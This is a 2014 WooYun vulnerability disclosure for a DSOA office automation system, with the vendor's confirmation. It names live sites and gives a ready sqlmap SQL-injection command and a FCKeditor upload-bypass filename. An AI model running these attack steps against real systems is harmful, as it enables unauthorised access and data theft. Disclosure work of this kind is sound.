漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-08-06: 细节已通知厂商并且等待厂商处理中
2014-08-11: 厂商已经确认,细节仅向厂商公开
2014-08-21: 细节向核心白帽子及相关领域专家公开
2014-08-31: 细节向普通白帽子公开
2014-09-10: 细节向实习白帽子公开
2014-09-20: 细节向公众公开
简要描述:
用户还是挺吊的。。
http://www.syc.com.cn/sys/Article/case/userlist/
详细说明:
问题案例举例:
http://oa.syc.com.cn/OA/index/index.aspx
http://xinhuachongming.com.cn/DSOA_TY/index/index.aspx
http://221.199.203.230:9001/dsoa/index/index.aspx
http://180.166.56.106/dsoa/index/index0.aspx
http://sd.tobacco.com.cn/dsoa_kgj_web/index/index0.aspx
1.后台信息泄露,访问后台虽然提示未登录,但是还是能显示部分内容,比如:
http://oa.syc.com.cn/oa/useradmin/index.aspx
2.oa使用2.6.3版本的fckeditor编辑器,可以上传任意文件,只不过需要点奇葩的文件名:
http://oa.syc.com.cn/oa/FCKeditor/editor/filemanager/connectors/asp/connector.asp
3.无需登录存在搜索型sql注射:
http://oa.syc.com.cn/oa/useradmin/index.aspx
漏洞证明:
用官网做证明:
1.后台信息泄露,访问后台虽然提示未登录,但是还是能显示部分内容,很多目录都这样,访问:http://oa.syc.com.cn/oa/useradmin/index.aspx
2.oa使用2.6.3版本的fckeditor编辑器,可以上传任意文件,只不过需要点奇葩的文件名:
http://oa.syc.com.cn/oa/FCKeditor/editor/filemanager/connectors/asp/connector.asp
本地构造上传页面:
这里按理说可以用asp的那个%00 url-decode截断上传的,但是各种传不上,变成随机文件名,这里就可以使用传说中的那个奇葩文件名来达到上传a.aspx.a;.a.aspx.jpg..jpg
3.无需登录存在搜索型sql注射:
http://oa.syc.com.cn/oa/useradmin/index.aspx
这个不完整的页面搜索功能还是可以用的:
sqlmap.py -u "http://oa.syc.com.cn/oa/useradmin/UserListNew.aspx" --data "__TabStrip1_State__=0&__ToolbarUserAdmin_State__=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNzg1NDQwNjM4D2QWAgIBD2QWAgIDD2QWBGYPZBYEAg0PDxYCHgRUZXh0ZWRkAg8PPCsABgEADxYCHhFTZWxlY3RlZE5vZGVJbmRleGVkZAIBDw8WAh4HVmlzaWJsZWhkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUJVGFiU3RyaXAxBRBUb29sYmFyVXNlckFkbWluwmO8Vml2IqiSkVWHQ62EgRlTww0%3D&__EVENTVALIDATION=%2FwEWAwKyicXjCwLN8eLGBwL9ruiTCIzo13VmxpbPYb4N7Kky5Vaefe0T&txtSearchUName=111&btnSearchUName1=%B2%E9+%D1%AF"
修复方案:
身份验证,过滤啥的。。
还没得过奖金如何是好!前面的洞都是小厂商流程好桑心!>_<
版权声明:转载请注明来源 Anyway13@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-08-11 10:39
厂商回复:
CNVD确认所述情况,同时由CNVD按以往建立的联系渠道向软件生产厂商通报,并将相关案例发给对应的多个分中心处置。
最新状态:
暂无